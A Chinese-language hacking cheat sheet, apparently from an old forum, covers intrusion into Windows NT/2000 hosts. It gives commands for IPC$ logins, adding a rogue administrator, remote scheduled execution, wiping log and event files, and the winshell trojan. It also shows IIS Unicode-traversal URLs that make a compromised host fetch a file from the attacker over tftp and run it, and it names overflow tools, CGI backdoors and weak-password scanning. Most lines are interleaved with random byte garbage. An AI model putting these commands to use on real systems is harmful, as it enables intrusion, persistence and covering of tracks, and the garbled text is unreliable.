网管和黑客都必须知道的命令
kr5'a:��F) 常用的几条NET命令:
>�S���H��W 8fQaMn��4V (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
p(S {k]ZL@ 3 bl�l�9Ey (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
Ip;;@o&D� �"$N 4S�9U (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
=}�YaV@g<f &,iPI2`O A (查看远程主机时间) net time \\IP地址
�E��L1�*@� k3r�<�']S^ (定时启动某个程序) at \\IP地址 02:18 readme.exe
�(:ij'Z�bz qJ�EtB;�J' (查看共享) net view \\IP地址
~�DUOL�~E� �~X�1<x4P\ (查看netbios工作组列表) nbtstat -A IP地址
^97�\TmzP{ l�=^�^��l` (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
U7d�0�5y�' 2B=�+p8�3< (这两条把自己增加到管理员组): net user 用户名 密码 /add
��{#�}?�-X S�)G*+�)� net localgroup Administrators 用户名 /add
<+e&E�9;>6 -5Ln�3\ O@ (断开连接) net use \\IP地址\ipc$ /delete
7�B#HF?,?
@d6N[?3; 扫尾:
&8QkGU�bS< !_j�6\�r�= del C:\winnt\system32\logfiles\*.*
{A���8w~3F aD�jYT�/`l del C:\winnt\ssytem32\config\*.evt
@7�OE:& #V 3Vb/Mn�!k� del C:\winnt\system32\dtclog\*.*
5t�m:|.`SQ �-����O�c� del C:\winnt\system32\*.log
NUGiD�J+[ &3bh�K5P�� del C:\winnt\system32\*.txt
}n$I #G}\/ 84M*)c�KR~ del C:\winnt\*.txt
�oD~q/0�4! @!2vS@��f� del C:\winnt\*.log
yo"!C?�82= XF�W�o"%}w 一、netsvc.exe
mA0|�W#NB �G�que�@u� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
�</)QCl'�d @�y{
�f>nm netsvc /list \\IP地址
wxo{��gBq� �C�c!LJ��� netsvc schedule \\IP地址 /query
%�pr}Xs(-f �C+�P����w netsvc \\IP地址 schedule /start
lsR�W.�h�, �+"�Mlj�$O 二、OpenTelnet.exe
HW�i: CDgm �H0�Ck%5�� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
/7p1�y ��v w.�R2' W�R OpenTelnet \\IP地址 用户名 密码 1 7878
ETt�o�Y<`# ��&�Vmx<�w 然后就可以telnet到主机的7878端口,进入DOS方式下:
2�N}h<Yd�9 L����s�(l� telnet IP地址 7878
u�d�GZ%Mr_ #��kPsg9�Y 三、winshell.exe
]m"�6a-,�` �,3FG' �q2 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
FpFkZFtG'm 4+�4C0/�$Y p Path (查看winshell主程序的路径信息)
nT�xN>?l2E �jK�-u�sn� b reBoot (重新启动机器)
PBp�+(o-�� QN OA6��6 d shutDown (关闭机器)
:ej`]y�K | e[*%tx H�� s Shell (执行后你就会看到可爱的“C:\>”)
p��)w{}@%r `ls^fnJTpf x eXit (退出本次登录会话,此命令并不终止winshell的运行)
y`�p(}X`�> �&U0Y#11Cx CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�5q�Q\��H} �G�jo&~*; 四、3389登陆器,GUI方式登录远程主机的
n��j�5Hls ,��N�oWAmv 五、elsave.exe
<;�':'�sW� �NM&�R\GI� 事件日志清除工具
��&��x��MQ \s"�>trXwX elsave -s \\IP地址 -l "application" -C
�W#lt_�2!j Wc�!.�{2�� elsave -s \\IP地址 -l "system" -C
�rEG!A87Zz �e�C�X�w8 elsave -s \\IP地址 -l "security" -C
�:}p<Hq 8Z �dn|OY.�`| 执行后成功清除应用程序日志,系统日志,安全日志
NGOyd1�$7N ?D �S|vCae 六、hbulot.exe
2kVQ#JyuRI hxx`�f-#�= 开启win2kserver和winxp的3389服务
oiNt�'HQ2/ V}+Ui]ie|I hbulot [/r]
�#JW~��&; �%8��~g�#Z 使用/r表示安装完成后自动重起目标使设置生效。
S# sar}-�I ]O.Z��4+6w 七、nc.exe(netcat.exe)
&�(YN��z9L =Z}=�n�S?4 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
$�J)2E� g !=rJ~s
F/{ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
x|q�|> dPB {�BS`v5*�� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
~k�7��80�� %P`w"H,v3# 参数:
|&0zA�P"\� #5�}�v��?� -e prog 程序重定向,一旦连接,就执行 [危险!!]
`CF.-Vl3J# ?N(opggiD� -g gateway source-routing hop point[s], up to 8
�'NDD�j0Y ��.YxcXe3# -G num source-routing pointer: 4, 8, 12, ...
u$V8�fus0� I2^�Eo�5' -h 帮助信息
G
��"`t$=0 �N/�i {j.= -i secs 延时的间隔
|�tqYRWn�0 j]�bNOC2.L -l 监听模式,用于入站连接
)M�E�'qA3K .l}o�xWWoS -n 指定数字的IP地址,不能用hostname
����"�E}38 /w�2jlu}yt -o file 记录16进制的传输
2<33BBl�WA ��WDq~��mi -p port 本地端口号
QTT�2P(Pz� $61j_;WF`� -r 任意指定本地及远程端口
A~%h*nZc%I m.2=,,r<Fq -s addr 本地源地址
%Tm8�sQ)1� JPGEE1!B{b -u UDP模式
�1�_�0\_|� d+Au�`�'{> -v 详细输出——用两个-v可得到更详细的内容
�rugR>&mea BNp�c-�O�~ -w secs timeout的时间
:Wl`�8�p4] rw�]7�Lr_> -z 将输入输出关掉——用于扫描时
;��/=�6~�% 八、TFTPD32.EXE
`=JG�l��N7 6UnWtLE
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
m(eR Wx&pZ ��?�fmW'vs http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
���L�+�J�) cOo@UU P�� 然后可以直接令文件运行:
] R-<v&�O -G@�:uxB� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�_��rj�B�. �X>kW)c4{b 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�d
gRTV<vM o=UL�o &�9 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
I!�;v�y/r� &��&K"3"um 一、一 Xscan命令行运行参数说明:
SvN2}�]Kh g��q[`�g=x 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
nHTb~t�5Ke 0o�&B� 7N� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�\>n�Y%*�� <Pg<F[�eDM xscan -file <主机列表文件名> <检测项目> [其他选项]
��TDR2){I� b�c�(b1u? 其中<检测项目> 含义如下:
yOr5kWq�X� >a$b�4
pvh -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
n��MU[S��+ i�$W��
E1- -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Z|IFT���1K ��o]���O� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
A
^U`c�'$ 1�G62Qu$O -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
4o�ywP^�I ��#xTu �{ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
q;�#:n�f"� Z&Ao�;=Gp1 [其他选项] 含义如下:
A!.*� eIV| �F|�&=�\�Q -v: 显示详细扫描进度
(X(�c.��Jj }Asp=<kC�c -p: 跳过Ping不通的主机
5B�,�HJ�ax Ye"#t�COEG -o: 跳过没有检测到开放端口的主机
5x1_�rjP$| Aa`�'g0wmc -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
